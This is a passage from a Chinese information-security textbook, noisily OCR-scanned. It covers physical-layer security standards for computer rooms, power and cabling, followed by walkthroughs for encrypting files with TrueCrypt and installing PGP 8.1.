的 威胁 源 发 起 的 恶意 攻击 、 严 重 的 自然 灾难 以 及 其 他 相当 危害 程度 的 威胁 所 造成 的 资源 
损害 ,能够 发 现 安全 漏洞 和 安全 事件 ,在 系统 遭 到 损害 后 ,能够 迅速 恢复 所 有 功能 。 


1.4.5 五 级 防护 


五 级 防护 没有 给 出 详细 的 描述 ,是 比 四 级 要 求 更 高 的 一 个 等 级 。 


1.5 课 后 体会 与 练习 


1. 你 所 知道 的 信息 安全 案例 都 有 哪些 ? 
2. 计算 机 信息 安全 技术 体系 都 有 哪些 内 容 ? 
3. 信息 安全 防护 进行 等 级 划分 的 意义 是 什么 ? 
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二 本 章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 : 
。 查找 物理 层 安全 方面 的 知识 ; 

。 查阅 物理 层 安全 方面 的 国家 标准 。 
2 本 章 教学 目标 

本 章 的 教学 目标 是 : 

。 了 解 物理 层 安全 技术 的 内 容 ; 

。 了解 物理 层 安全 技术 的 相关 规范 与 标准 。 
二 本章 教学 要 点 

本 章 的 教学 要 点 包括 : 

。 物理 层 安全 技术 内 容 ; 

。 物理 层 安全 国家 标准 。 

< 本 章 教学 建议 

本 章 内 容 采 用 讲授 方法 进行 教学 。 


2.1 物理 层 安 全 技术 概述 


物理 安全 是 整个 计算 机 信息 系统 安全 的 前 提 , 是 保护 计算 机 设备 .设施 以 及 其 他 媒体 
免 草 地震, 水灾、 火灾 等 环境 事故 .人 为 操作 失误 或 各 种 计算 机 犯罪 行为 导致 的 破坏 的 过 
程 。 物 理 安全 主要 考虑 的 问题 是 环境 ,场地 和 设备 的 安全 及 物理 访问 控制 和 应 急 处 置 计 
划 等 。 物 理 安全 在 整个 计算 机 信息 系统 安全 中 占有 重要 地 位 。 

它 主要 包括 以 下 几 个 方面 : 

CD 环境 物理 安全 (防火 .防盗 防备、 接地 、 防 尘 、 防 静电 和 防震 ); 

(2) 设备 物理 安全 (电磁 干扰 ,电源 保护 ,物理 损 坏 和 意外 事故 等 )， 

(3) 电路 系统 安全 (电源 稳定 性 、 不 间断 电源 和 备用 电源 ); 

(4) 通信 线路 安全 ( 防 窃听 和 防 施 工 )。 

物理 安全 措施 主要 包括 安全 制度 .数据 备份 .辐射 防护 .屏幕 口令 保护 、 隐 藏 销毁 、 状 
态 检测 ,报警 确认 、 应 急 恢复 、 加 强 机 房管 理 、 运 行 管理 ,安全 组 织 和 人 事 管理 等 手段 。 

物理 安全 是 相对 的 ,在 设计 物理 安全 方案 时 ,要 综合 考虑 需要 保护 的 硬件 、 软 件 及 其 
信息 价值 ,从 而 采用 适当 的 物理 保护 措施 。 
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根据 我 国 的 国家 标准 GB/T 21052 一 2007《 信 息 安全 技术 一 一 信息 系统 物理 安全 技 
术 要 求 》, 以 GB/T17859 一 1999 对 于 五 个 安全 等 级 的 划分 为 基础 ,依据 GB/T20271 一 
2006 五 个 安全 等 级 中 对 于 物理 安全 技术 的 不 同 要 求 ,结合 当前 我 国 计 算 机 、 网 络 和 信息 
安全 技术 发 展 的 具体 情况 ,根据 适度 保护 的 原则 ,将 物理 安全 技术 等 级 分 为 五 个 不 同 级 
别 ,并 对 信息 系统 安全 提出 了 物理 安全 技术 方面 的 要 求 。 不 同安 全 等 级 的 物理 安全 平台 
为 相对 应 安全 等 级 的 信息 系统 提供 应 有 的 物理 安全 保护 能 力 。 

与 物理 层 安 全 相关 的 国家 标准 及 技术 规范 主要 包括 以 下 的 标准 和 规范 。 

GB/T 2887—2000 电子 计算 机 场地 通用 规范 ; 

GB/T 4365—1995 电磁 兼容 术语 (idt IEC 50(161) :1990); 

GB 4943—2001 信息 技术 设备 的 安全 (idt IEC 60950:1999); 

GB 8702—1988 电磁 辐射 防护 规定 ; 

GB 9175 一 1988 环境 电磁 卫生 标准 ; 

GB 9254—1998 信息 技术 设备 的 无 线 电 骚扰 限 值 和 测量 方法 (idt CISPR 22:1997); 

GB/T 9361—1988 计算 机 场地 安全 要 求 ; 

GB/T 9813 一 2000 微型 计算 机 通用 规范 ; 

GB/T 17626. 2 一 1998 电磁 兼容 试验 和 测量 技术 静电 放电 抗 扰 度 试验 (idt IEC 
61000-4-2:1995); 

GB/T 17626. 3 一 1998 电磁 兼容 试验 和 测量 技术 射频 电磁 场 辐射 抗 扰 度 试验 (idt 
IEC 61000-4-3:1995); 

GB/T 17626. 4 一 1998 电磁 兼容 试验 和 测量 技术 电 快速 瞬 变 脉冲 群 抗 扰 度 试验 (idt 
IEC 61000-4-4:1995); 

GB/T 17626. 5 一 1998 电磁 兼容 试验 和 测量 技术 浪 涌 (冲击 ) 抗 扰 度 试验 (idt IEC 
61000-4-5:1995); 

GB/T 17626. 6 一 1998 电磁 兼容 试验 和 测量 技术 射频 场 感应 的 传导 骚扰 抗 扰 度 (idt 
IEC 61000-4-6:1995); 

GB/T 17626. 8 一 1998 电磁 兼容 试验 和 测量 技术 工 频 磁场 抗 扰 度 试验 (idt IEC 
61000-4-8:1995); 

GB/T 17626. 9 一 1998 电磁 兼容 试验 和 测量 技术 脉冲 磁场 抗 扰 度 试验 (idt IEC 
61000-4-9:1995); 

GB/T 17626. 11 一 1998 电磁 兼容 试验 和 测量 技术 电压 暂 降 、 短 时 中 断 和 电压 变化 
的 抗 扰 度 试验 (idt IEC 61000-4-11:1995); 

GB 17859 一 1999 计算 机 信息 系统 安全 保护 等 级 划分 准则 ; 

GB/T 20271 一 2006 信息 安全 技术 信息 系统 安全 通用 技术 要 求 ; 

GB 50057 一 1994 建筑 物 防 雷 设计 规范 (2000 年 版 ); 

GB 50174 一 1993 电子 计算 机 机 房 设计 规范 ; 

GB 50311—2000 建筑 与 建筑 群 综合 布线 系统 工程 设计 规范 ; 

GBJ 16 一 1987 建筑 设计 防火 规范 (2001 年 版 )。 

在 进行 信息 系统 建设 时 ,要 根据 需求 确定 不 同 的 安全 防护 等 级 ,再 根据 不 同 的 安全 等 
级 执行 不 同 的 物理 安全 标准 。 下 面 描述 的 内 容 , 将 不 再 针对 某 一 特定 分 级 进行 。 
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2.2 环境 物理 安全 


环境 物理 安全 主要 指 的 是 机 房 环境 在 设计 和 建造 时 要 考虑 的 相关 因素 。 我 国 国家 标 
准 (参考 电子 统 机 房 设计 规 GB50174 一 2008) 将 机 房 划分 为 三 个 安全 等 级 : ARB 
级 和 C 级 (国际 上 一 般 分 为 四 级 ) 。 

A 级 为 容错 型 ,在 系统 需要 运行 期 间 , 其 场地 设备 不 应 因 操 作 失 误 .设备 故障 、 维 护 
和 检修 而 导致 电子 信息 系统 运行 中 断 , 如 图 2.1 所 示 。 


图 2.1 A 级 机 房 


B 级 为 元 余 型 ， 要 运行 期 间 , 其 场地 设备 在 宛 余 能 力 范围 内 ,不 应 因 设备 故 
障 而 导致 电子 信 |) 运行 中 断 。 

C 级 为 基本 型 ,在 场地 设备 正常 运行 情况 下 ,应 保证 电子 信息 系统 不 中 断 。 

2.2.1 机 房 位 置 及 设备 布置 

1. 机 房 位 置 选择 

计算 机 信息 系统 机 房 位 置 选择 应 符合 下 列 要 求 : 

CD 水 源 充足 ,电力 比较 稳定 可 靠 ,交通 通信 方便 ,自然 环境 清洁 ; 

(2) 远离 产生 粉尘 .油烟 和 有 害 气体 以 及 生产 或 贮存 具有 腐蚀 性 、 易 燃 和 易 爆 物品 的 
工厂 仓库 和 堆 场 等 

(3) 远离 水 灾 隐 患 区 域 ; 

(4) 远离 强 震 源 和 强 噪声 源 ; 

O) 避 开 强 电 磁场 干扰 。 

对 于 多 层 或 高 层 建筑 物 内 的 信息 系统 机 房 , 在 确定 主机 房 的 位 置 时 ,应 对 设备 运输 、 
管线 敷设 .雷电 感应 和 结构 荷载 等 问题 进行 综合 考虑 和 经 济 比 较 。 

2. 设备 布置 

计算 机 信息 系统 机 房 的 设备 布置 应 满足 机 房管 理 、 人 员 操 作 和 安全 ,物料 运输 ,设备 
散热 ,设备 安装 和 维护 的 要 求 。 产 生 尘 埃及 废物 的 设备 应 远离 对 尘埃 敏感 的 设备 ,并 宜 布 
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置 在 有 隔断 的 单独 区 域内 。 机 柜 或 机 架 的 布置 宜 采 用 面对面 和 背 对 背 的 方式 。 机 柜 或 机 
架 面 对 面 布置 形成 冷风 通道 , 背 对 背 布置 形成 热风 通道 。 

服务 器 机 房 和 网 络 机 房 等 用 于 摆 放 机 柜 的 房间 ,通道 与 设备 间 的 距离 应 符合 下 列 
规定 : 

(1) 面对面 布置 的 机 柜 或 机 架 正 面 之 间 的 距离 应 不 小 于 1. 5m; 

(2) 背 对 背 布 置 的 机 柜 或 机 架 背 面 之 间 的 距离 应 不 小 于 1m s 

CD 成 行 排列 的 机 柜 , 其 长 度 超过 6m 时 ,两 端 应 设 有 出 口 通道 ; 

(4) 当 两 个 出 口 通道 之 间 的 距离 超过 15m 时 ,其 间 还 应 增加 出 口 通道 ; 

(5) 各 通道 宽度 应 不 小 于 1ms 

(6) 当 需 要 维修 测试 时 ,应 不 小 于 1. 2m。 


2.2.2 ”机房 环境 安全 要 求 


1. 安全 管理 

减少 无 关 人 员 进 入 机 房 的 机 会 是 计算 机 机 房 设 计时 首先 要 考虑 的 问题 。 计 算 机 机 房 
在 选 址 时 应 避免 靠近 公共 区 域 ,避免 窗户 直接 邻 街 。 计 算 机 机 房 最 好 不 要 安排 在 底层 或 
顶层 ,在 较 大 的 楼 层 内 ,计算 机 机 房 应 靠近 楼 层 的 一 边 安排 布局 。 保 证 所 有 进出 计算 机 机 
房 的 人 都 必须 在 管理 人 员 的 监控 之 下 。 

2. 防盗 

对 机 房 内 重要 的 设备 和 存储 媒体 应 采取 严格 的 防盗 措施 。 机 房 防盗 措施 主要 包括 光 
纤 电 缆 防 资 系统 、 特 殊 标签 防盗 系统 和 视频 监视 防盗 系统 等 。 

3, «e 

温度 ,湿度 和 洁净 度 称 为 “三 度 ”。 为 使 机 房 内 的 “三 度 ” 达 到 规定 的 要 求 , 空 调 系统 和 
除尘 器 是 必 不 可 少 的 设备 。 重 要 的 计算 机 系统 安放 处 还 应 配备 专用 的 空调 系统 , 它 比 公 
用 的 空调 系统 在 加 湿 和 除尘 等 方面 有 更 高 的 要 求 。 

4. 防 静电 

不 同 物体 间 的 相互 磨擦 和 接触 就 会 产生 静电 。 计 算 机 系统 的 CPU 和 RAM 等 关键 
部 件 大 都 采用 大 规模 集成 电路 制 成 .对 静电 极为 敏感 .容易 因 静 电 而 损坏 。 防 静电 措施 主 
要 有 : 

A) 机 房 的 内 装修 材料 采用 乙烯 材料 ; 

(2) 机 房 内 安装 防 静 电 地 板 , 并 将 地 板 和 设备 接地 ; 

(3) 机 房 内 的 重要 操作 台 应 接地 ; 

(4) 工作 人 员 的 服装 和 鞋 最 好 用 低 阻 值 的 材料 制作 ; 

(5) 机 房 内 应 保持 一 定 湿度 。 

5. 接地 与 防 雷 

接地 与 防 雷 是 保护 计算 机 信息 系统 和 工作 场所 安全 的 重要 措施 。 接 地 是 指 整 个 计算 
机 信息 系统 中 各 处 电位 均 以 大 地 电位 为 零 参 考 电 位 (图 2. 2) 。 接 地 可 以 为 计算 机 系统 的 
数字 电路 提供 一 个 稳定 的 0V 参考 电位 ,从 而 可 以 保证 设备 和 人 身 的 安全 ,同时 也 是 防止 
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电磁 泄漏 的 有 效 手段 。 机 房 外 部 防 雷 应 使 用 接 闪 器 . 引 下 线 和 接地 装置 ,吸引 雷电 流 ,并 
为 其 泄 放 提供 一 条 低 阻 值 通道 。 机 房 内 部 防 雷 主要 采取 屏 项、 等 电位 连接 、 合 理 布线 或 防 
闪 器 过 电压 保护 等 技术 措施 以 及 拦截 .屏蔽 、 均 
压 、 分 流 和 接地 等 方法 ,达到 防 雷 的 目的 。 机 房 的 
设备 本 身 也 应 有 避雷 装置 和 设施 。 

6. 防火 与 防水 

机 房 内 应 有 防火 和 防水 措施 。 机 房 内 应 有 火 
灾 和 水 灾 自 动 报警 系统 ,如 果 机 房 上 层 有 用 水 设施 
需 加 防水 层 ,机房 内 应 放置 适用 于 计算 机 机 房 的 严 A OU 
火器 ,并 建立 应 急 计划 和 防火 制度 。 Wiz Fndu 


2.3 设备 物理 安全 


信息 系统 安全 体系 划分 标准 和 种 类 十 分 繁杂 ， 
整体 上 可 分 为 国际 标准 和 国家 标准 两 大 类 ,比如 国际 标准 化 组 织 定 义 的 “开放 系统 互 连 安 
全 体系 结构 ISO 7498 一 2”, 其 标准 结构 如 图 1.9 所 示 。 


2.3.1 硬件 设备 的 维护 和 管理 


计算 机 网 络 系统 的 硬件 设备 一 般 价 格 昂贵 ,一 旦 被 损坏 而 又 不 能 及 时 修复 ,可 能 会 产 
生 严重 的 后 果 。 因 此 ,必须 加 强 对 计算 机 网 络 系统 硬件 设备 的 使 用 管理 ,坚持 做 好 硬件 设 
备 的 日 常 维护 和 保养 工作 。 

1. 硬件 设备 的 使 用 管理 

(1) 严格 按 硬 件 设备 的 操作 使 用 规程 进行 操作 。 

(2) 建立 设备 使 用 情况 日 志 , 并 登记 使 用 过 程 。 

(3) 建立 硬件 设备 故障 情况 登记 表 。 

(4) 坚持 对 设备 进行 例 行 维护 和 保养 ,并 指定 专人 负责 。 

2. 常用 硬件 设备 的 维护 和 保养 

常用 硬件 设备 的 维护 和 保养 包括 主机 、 显 示 器 、 软 盘 、 软 驱 、 打 印 机 和 硬盘 的 维护 保 
养 ; 网 络 设备 如 HUB、 交 换 机 、 路 由 器 .MODEM 、RJ45 接头 和 网 络 线 缆 等 的 维护 保养 ;还 
要 定期 检查 供电 系统 的 各 种 保护 装置 及 地 线 是 否 正 常 。 


2.3.2 电磁 兼容 和 电磁 辐射 的 防护 


l. 电磁 兼容 和 电磁 辐射 
电磁 兼容 性 就 是 电子 设备 或 系统 在 一 定 的 电磁 环境 下 互相 兼顾 、 相 容 的 能 力 。 计 算 
机 网 络 系统 的 各 种 电子 设备 在 工作 时 都 不 可 避免 地 会 向 外 辐射 电磁 波 ,同时 也 会 受到 其 
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他 电子 设备 的 电磁 波 干扰 , 当 电磁 干扰 达到 一 定 的 程度 就 会 影响 设备 的 正常 工作 。 

电磁 干扰 可 通过 电磁 辐射 和 传导 两 条 途径 影响 电子 设备 的 工作 。 一 种 是 电子 设备 辐 
射 的 电磁 波 通 过 电路 看 合 到 另 一 台电 子 设备 中 引起 干扰 ;另外 一 种 是 通过 连接 的 导线 、 电 
源 线 和 信号 线 等 而 合 而 引起 相互 之 间 的 干扰 。 

2. 电磁 辐射 防护 的 措施 

对 传导 发 射 的 防护 主要 采取 对 电源 线 和 信号 线 加 装 性 能 良好 的 滤波 器 , 减 小 传输 阻 
抗 和 导线 间 的 交叉 耦合 ;对 辐射 的 防护 措施 可 采用 各 种 电磁 屏蔽 措施 (如 图 2. 3 所 示 的 带 
电磁 屏蔽 功能 的 机 柜 ) ,也 可 采用 干扰 的 防护 措施 。 


图 2.3 带电 磁 屏 蔽 功能 的 机 柜 


2.3.3 信息 记录 介质 的 安全 管理 


设置 记录 介质 库 ,对 出 入 介质 库 的 人 员 实 施 记录 ,无 关 人 员 不 得 入 内 。 对 有 用 数据 、 
重要 数据 、 使 用 价值 高 的 数据 和 秘密 程度 很 高 的 数据 以 及 对 系统 运行 和 应 用 起 关键 作用 
的 数据 记录 介质 实施 分 类 标记 、 登 记 并 保存 。 记 录 介 质 库 应 具备 措施 防盗 和 防火 功能 ,对 
于 磁性 介质 应 该 有 防止 介质 被 磁化 的 措施 ,如 图 2. 4 所 示 的 带 防磁 功能 的 信息 安全 介质 
存储 柜 。 记 录 介 质 的 借用 应 规定 审批 权限 ,对 于 系统 中 有 很 高 使 用 价值 或 很 高 秘密 程度 
的 数据 ,应 采用 加 密 等 方法 进行 保护 ,如 图 2. 5 所 示 的 带 指纹 识别 功能 的 U 盘 。 对 于 应 该 
删除 和 销毁 的 重要 数据 ,要 有 严格 的 管理 和 审批 手续 ,并 采取 有 效 措 施 ,防止 被 非法 拷贝 。 


b 


图 2.4 带 防磁 功能 的 信息 安全 介质 存储 柜 图 2.5 带 指纹 识别 功能 的 U 盘 
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对 于 涉 密 计算 机 及 重要 数据 传输 ,要 制定 严格 的 保密 管理 系统 及 相应 的 管理 机 制 ,如 
图 2.6 所 示 。 切 实 保 证 信息 记录 介质 安全 。 
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图 2.6 涉 密 计 算 机 及 移动 存储 介质 保密 管理 系统 


2.4 电路 系统 安全 


根据 中 华人 民 共 和 国 国家 标准 GB/T 22239 一 2008,《 信 息 安全 技术 一 一 信息 系统 安 
全 等 级 保护 基本 要 求 》, 信 息 系统 根据 其 在 国家 安全 、 经 济 建设 和 社会 生活 中 的 重要 程度 ， 
章 到 破坏 后 对 国家 安全 ,社会 秩序 、 公 共 利 益 以 及 公民 、 法 人 和 其 他 组 织 的 合法 权益 的 危 
害 程度 等 ,由 低 到 高 划分 为 五 级 ,不 同等 级 的 信息 系统 应 具备 的 基本 安全 保护 能 力 如 下 。 


2.4.1 国内 外 关于 电源 的 相关 标准 


电源 系统 电压 的 波动 . 浪 涌 电 流 和 突然 断 电 等 意外 情况 可 能 引起 计算 机 系统 存储 信 
息 的 丢失 \ 存 储 设 备 的 损坏 等 情况 的 发 生 ,电源 系统 的 安全 是 计算 机 网 络 系统 物理 安全 的 
一 个 重要 组 成 部 分 。 国 内 外 关于 电源 的 相关 标准 主要 如 下 。 

1. 直流 电源 的 相关 标准 

IEC478. 1 一 1974《 直 流 输出 稳定 电源 术语 》; 

IEC478. 2 一 1986《 直流 输出 稳定 电源 额定 值 和 性 能 》; 

IEC478. 3—1989( 直流 输出 稳定 电源 传导 电磁 干扰 的 基准 电 平 和 测量 》; 

IEC478. 4 一 1976《 直 流 输出 稳定 电源 除 射频 干扰 外 的 试验 方法 》; 

IEC478. 5 一 1993《 直 流 输出 稳定 电源 电抗 性 近 场 磁场 分 量 的 测量 》。 

有 关 直 流 稳定 电源 的 电子 行业 标准 有 SJ2811. 1 一 87《 通 用 直流 稳定 电源 术语 及 定 
X. PERES GE f) RI SJ2811. 2 一 87《 通 用 直流 稳定 电源 测试 方法 》。 
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2. 交流 电源 的 相关 标准 

国际 电工 委员 会 (IEC) 于 1980 年 颁布 了 IEC686 一 80《 交 流 输出 稳定 电源 》。 

1994 年 , 原 电 子 工业 部 颁布 了 电子 行业 标准 SJ/T10541 一 94《 抗 干扰 型 交流 稳 压 电 
源 通用 技术 条 件 》 和 SJ/T10542 一 94《 抗 干扰 型 交流 稳 压 电源 测试 方法 》。 

国标 GB2887 一 2011《 计 算 机 场地 通用 规范 )》 和 GB9361 一 2011《 计 算 机 场地 安全 要 
求 ) 中 也 对 机 房 安 全 供电 做 了 明确 的 要 求 。 国 标 GB2887 一 2011 将 供电 方式 分 为 三 类 。 

一 类 供电 : 应 具有 双 路 市 电 ( 或 市 电 、 备 用 发 电机 ) 加 不 间断 电源 系统 ,如 图 2.7 所 示 。 

二 类 供电 : 应 具有 不 间断 电源 系统 。 

三 类 供电 : 按 一 般 用 户 供电 系统 考虑 。 


输入 
市 电 1 ATS2L_ | 配 电 上 _ JUPS| | 
市 电 2 
输入 
ATS3.—C 配 电 c UPS 一 一 
油 机 柜 2 电源 2 x 


图 2.7 高 可 靠 性 双 路 供电 系统 (一 类 供电 ) 


2.4.2 室内 电源 设备 的 安全 


室内 电源 设备 的 安全 主要 应 考虑 两 点 : 一 是 电力 能 源 的 可 靠 供应 ;二 是 电源 对 用 电 
设备 安全 的 潜在 威胁 (威胁 主要 包括 脉动 与 噪声 和 电磁 干扰 这 两 种 ) 。 


2.5 传输 介质 物理 安全 


在 传输 介质 物理 安全 方面 要 做 到 : 通信 线路 应 远离 强 电 磁场 辐射 源 , 埋 于 地 下 或 采 
用 金属 套 管 :通信 线路 应 铺设 或 租用 专线 。 系 统 应 具有 防止 通信 线路 被 截获 及 外 界 对 系 
统 通 信 线 路 的 干扰 功能 ,至 少 应 提供 以 下 一 种 功能 : 

(1) 预防 线路 截获 ,使 线路 截获 设备 无 法 正常 工作 ; 

(2) 探测 线路 截获 ,发 现 线路 截获 并 报警 ; 

(3) 定位 线路 截获 ,发现 线 路 截获 设备 工作 的 位 置 ; 

CD 对 抗 线路 截获 ,阻止 线路 截获 设备 的 有 效 使 用 。 


2.6 本 章 小 结 


下 面 通过 国标 GB50174 一 2008《 电 子 信息 系统 机 房 设计 规范 ) 一 一 各 级 电子 信息 系 
统 机 房 技术 要 求 ( 见 表 2. D ,总 结 一 下 典型 的 物理 层 安全 技术 要 求 。 
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2.7 课 后 体会 和 练习 


1. 物理 层 安 全 的 主要 内 容 是 什么 ? 
2. 根据 你 的 理解 ,请 描述 一 下 制定 物理 层 安全 国家 标准 的 重要 意义 。 


$8 33x — 加密 与 解密 技术 


亏本 章 课 前 准备 

学 习 本 章 内 容 之 前 ,需要 准备 如 下 知识 ， 

。 查找 加 密 技术 的 相关 技术 与 具体 应 用 场景 ; 
。 了 解 加 密 和 解密 的 具体 作用 。 

过 本 章 教学 目标 

本 章 的 教学 目标 是 : 

。 学 习 和 掌握 常用 的 加 密 和 解密 技术 ; 

。 了 解 典 型 的 加 密 解密 算法 。 

< FERFEAR 

本 章 的 教学 要 点 包括 ; 

。 加 密 解 密 技 术 的 常规 实践 ; 

。 典型 密码 技术 。 

过 本 章 教 学 建议 

。 本 章 内 容 建议 采用 实践 案例 引导 模式 进行 教学 。 


3.1 加 密 与 解密 概述 


每 个 人 都 有 不 想 被 别人 看 到 的 文件 ,也 许 是 你 的 日 记 , 也 许 是 公司 的 绝密 文件 ,也 许 
是 你 的 私人 照片 …… 这 些 都 是 隐私 数据 。 还 有 一 些 数 据 你 可 能 只 想 给 部 分 人 看 到 ,这 些 
应 该 称 之 为 受 保护 的 数据 ,比如 网 上 传送 的 银行 交易 操作 数据 等 。 如 何 设置 合适 的 数据 
保护 方式 对 于 现代 人 来 说 是 十 分 重要 的 。 

本 章 通 过 一 些 实践 操作 和 相关 内 容 讲解 ,使 读者 学 会 如 何 保护 好 自己 的 数据 。 如 果 
保护 得 不 好 ,这 些 数 据 可 能 会 被 别有用心 的 人 利用 。 


3.2 加 密 技 术 


3.2.1 实践 案例 3-1: 常用 加 密 技 术 实 践 


本 实践 案例 将 通过 一 个 专用 软件 ,对 要 保护 的 计算 机 文件 进行 加 密 设置 ,具体 步骤 
如 下 。 
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1. 下 载 软件 TrueCrypt 

该 软件 为 比较 常用 的 加 密 软 件 , 具 有 如 下 特性 : 

(1) 兼容 性 好 ; 

(2) 文件 被 加 密 后 ,即使 电脑 重 装 系统 ,也 可 以 正常 解密 打开 ; 

(3) 加 密 速度 快 ; 

(4) 加 密 属于 真实 的 加 密 , 而 不 是 简单 的 隐藏 文件 ,该 软件 大 约 为 1. 33MB( 具 体 容 
量 看 对 应 的 版 本 ) ,加 密 后 的 文件 可 以 脱离 操作 系统 存在 ,不 用 担心 重 装 系统 后 会 打 不 开 
以 前 的 加 密 文件 , 它 还 具有 机 密 过 程 简单 .操作 方便 .保密 性 好 等 诸多 优点 。 

2. 生成 一 个 文件 保险 柜 

使 用 这 个 软件 加 密 文件 就 先 要 生成 一 个 一 定 大 小 的 文件 保险 柜 , 并 为 文件 保险 柜 取 
个 名 字 , 可 以 任意 取 。 可 以 把 这 个 保险 柜 放 在 任何 地 方 , 不 建议 放 在 系统 盘 C i DL E 
装 系统 会 格式 化 导致 你 的 文件 丢失 。 该 文件 是 可 以 移动 的 ,因为 在 外 表 看 来 , 它 只 是 一 个 
普 普通 通 的 文件 。 

现在 建立 一 个 文件 保险 柜 , 双 击 打 开 软 件 文件 夹 里 面 的 TrueCrypt. exe 主 程序 文件 ， 
如 图 3. 1 所 示 。 


- Language. Language. Licensetdt TrueCrypt 
zh-hkxml zh-twxml Formatex 


e 


AB s 
TrueCrypt. | truecrypts — truecrypt- 
ex ys x64.sys 


3.1 打开 TrueCrypt 主 程序 


COD. 在 打开 的 程序 窗口 ,选择 菜单 “加 密 卷 >“ 创建 加 密 卷 ”, 如 图 3. 2 所 示 。 

(2) 在 弹出 的 对 话 框 中 接着 连续 两 次 单 击 " 下 一 步 ”, 如 图 3.3 所 示 。 

(3) 窗口 出 现 如 图 3. 4 所 示 的 对 话 框 ,询问 将 要 生成 的 加 密 卷 位 置 。 单 击 后 面 的 “ 选 
择 文件 ”, 然 后 找到 要 放置 文件 保险 柜 的 文件 夹 。 再 在 下 方 文件 名 的 地 方 , 写 和 要 给 文件 
保险 柜 取 的 名 字 。 

(4) 如 图 3.5 所 示 , 单 击 “ 下 一 步 ?按钮 就 可 以 了 。 不 需要 选择 其 他 算法 ,这 种 就 够 安 
全 了 。 
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Mitte 


TrueCrypt 加 密 卷 创建 向 导 
^ eamas 


3.3 ”选择 “创建 文件 型 加 密 卷 ” 
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图 3.5 加 密 选项 


(5) 设置 加 密 卷 (文件 保险 柜 ) 的 大 小 ,如 图 3.6 所 示 。 这 里 选择 生成 1GB 的 保险 
柜 。 然 后 单 击 “ 下 一 步 ”。 

(6) 设置 加 密 卷 (文件 保险 柜 ) 的 密码 ,如 图 3.7 Bron o 

CD 这 里 可 以 设置 单纯 的 密码 。 也 可 以 同时 色 选 下 方 的 “使 用 密 钥 文件 ?并 选择 一 个 
电脑 里 面 的 文件 作为 密码 ,如 图 3. 8 所 示 。 这 是 这 个 软件 很 特殊 的 地 方 。 如 果 同 时 选择 
文件 作为 密码 的 话 ,你 的 文件 保险 柜 基 本 上 是 无 人 能 破解 的 。 选 择 好 文件 密 钥 后 ,依次 单 
击 “ 确 定 ” 按 钮 和 “下 一 步 ” 按 钮 。 

(8) 单 击 “文件 系统 ”下 拉 菜 单 ,选择 NTFS., 然 后 单 击 “ 格 式 化 ”按钮 ,如 图 3. 9 所 示 。 
格式 化 过 程 如 图 3. 10 所 示 。 

(9) 格式 化 完毕 后 加 密 卷 就 已 经 创建 好 了 ,进入 如 图 3. 11 所 示 的 界面 ,这 里 不 要 单 
击 “ 下 一 步 ” 按 钮 ,直接 单 击 “ 退 出 ”按钮 。 
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图 3.7 设置 加 密 卷 密码 


图 3.8 密 钥 设置 
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加 密 卷 格式 化 
Eo 


9DOCRD9AZS63CAP39643F4299D4SBéCl [V 
1 
+20: 


l m 
RA ae “k 
和 


ieai aa . ofa 
图 3.9 加密 卷 格式 化 类 型 设置 


m. 
加 密 准 格式 化 
MM WERL ree 


: OFZOSFASEAB4SI6OS7CECDCB9063P679 所 
lt 32563176866CD921C62EAGBCS BBeCOD. .. 
j: ASCC402591568DDGCDOEC1165FDDO7C2.. - 


umm C» ] 
FR| 25e w — 速度 ases MR ne 


re puro cie al 


Er imm | stt RA 
图 3. 10 ”加密 卷 格式 化 操作 


h, 
加 密 卷 已 创建 


pr ri a 


aia) «ERO E] 


图 3.11 加 密 卷 创建 完成 


(10) 这 样 加 密 保险 箱 生成 了 ,如 图 3. 12 所 示 。 
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图 3.12 生成 加 密 保险 箱 


3.2.2 实践 案例 3-2: 对 称 / 非 对 称 加 密 技 术 实践 


PGP(Pretty Good Privacy) 是 一 个 基于 RSA 公 匙 加 密 体系 的 邮件 加 密 软件 。 可 以 
用 它 对 邮件 保密 以 防止 非 授权 者 阅读 , 它 还 能 对 邮件 加 上 数字 签名 从 而 使 收 信人 可 以 确 
认 邮 件 的 发 送 者 ,并 能 确信 邮件 没有 被 算 改 。 它 可 以 提供 一 种 安全 的 通信 方式 ,而 事先 并 
不 需要 任何 保密 的 渠道 用 来 传递 密 匙 。 它 采用 了 一 种 RSA 和 传统 加 密 的 杂 合算 法 ,用 于 
数字 签名 的 邮件 文摘 算法 和 加 密 前 压缩 等 , 它 还 有 一 个 良好 的 人 机 工程 设计 。 它 的 功能 
强大 ,有 很 快 的 速度 ,而 且 它 的 源 代码 是 免费 的 。 

1. 下 载 安 装 软件 PGP8. 1( 英 文 版 ) 

CD 双击 安装 程序 ,如 图 3. 13 所 示 。 


Welcome 


Welcome lo the PGP 8.1 installer. We strongly recommend 
that you exit all Windows programs before continuing. 


Thank you for using our products. 


3.13 加 密 卷 创 建 完 成 
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(2) f£ User Type 对 话 框 中 ,选择 需要 创建 并 设置 一 个 新 的 用 户 信息 ,如 图 3. 14 
所 示 。 


User Type 
Please tell us if you have existing PGP Keyrings you'd like to use. 


Do you aheady have PGP keyrings you would ike to use? 


图 3.14 创建 新 用 户 


(3) 选择 程序 安装 目录 ,如 图 3. 15 所 示 。 


Install Directory. 
Use the Browse button to select your desired destination folder. 


Setup will install PGP 8.1 in the folowing folder. 


To install to this folder, click the Next button. To instal to a diferent folder, click the 
Browse button and select another folder. 


Destination Folder 
C. VPGP Corporationi PGP for Windows XP. Browse. | 


ee] _ cree | 
图 3.15 选择 安装 路 径 


(4) 在 Select Components 对 话 框 中 ,选择 磁盘 加 密 \ICQ 加 密 和 邮件 加 密 , 如 图 3. 16 
所 示 。 

(5) 安装 结束 

2. 生成 密 钥 

CD 重启 系统 成 功 后 ,屏幕 右 下 角 出 现 一 个 锁 标 识 , 单 击 它 , 选 择 PGPkeys, 如 图 3. 18 
Bra. 

(2) 接 下 来 选择 Keys New Key… 开 始 生成 密 钥 ,如 图 3. 19 Bros 。 


由 系统 ,如 图 3. 17 所 示 。 
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PGP 8.1 


Select Components 
Choose the components Setup wil install 


Select the components you want to install, and clear the components you do not want to 
instal. 


A PGPdsk Volume Securty [i= 

vi PGPmai for ICQ i IUD 
PGPmail for Microsoft Outlook program Res for d 

(Vf) PGPmai for Microsoft Outlook Express EE 


OE PGPmai for Qualcomm Eudora 
CX PGPmai for GroupWise 


Space Required on C: 12532K 
Space Available on C: 130291848 K 


图 3.16 选择 加 密 应 用 选项 


PGP 8.1 install complete. 


PGP 8.1 has been successful installed. Before you can use 
the program. you must restart your computer. 


IV. les. | wan to restart my computer now] 


图 3.17 安装 完成 重启 


Hide 


